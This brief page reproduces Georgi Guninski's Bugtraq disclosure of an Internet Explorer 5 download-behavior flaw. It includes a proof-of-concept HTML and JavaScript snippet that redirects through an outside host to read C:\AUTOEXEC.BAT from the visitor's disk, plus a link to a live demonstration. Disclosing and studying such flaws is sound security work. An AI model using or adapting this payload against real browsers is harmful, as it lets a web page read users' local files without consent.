|
Microsoft IE5 Download Behavior Vulnerability
From Georgi Guninski's post to Bugtraq: <SCRIPT> function doit(s) { alert ("Here is your file:\n"+s); } </SCRIPT> <A ID="oD" STYLE="behavior:url(#default#download)" HREF="javascript:oD.startDownload('http://www.nat.bg/~joro/reject.cgi?autoexec', doit)">Click here to read C:\AUTOEXEC.BAT</A>. <!-- ("http://www.nat.bg/~joro/reject.cgi?autoexec" just does a HTTP redirect to file://c:/autoexec.bat) --> Demonstration available at: http://www.nat.bg/~joro/download2.html |
|
|
Privacy Statement |
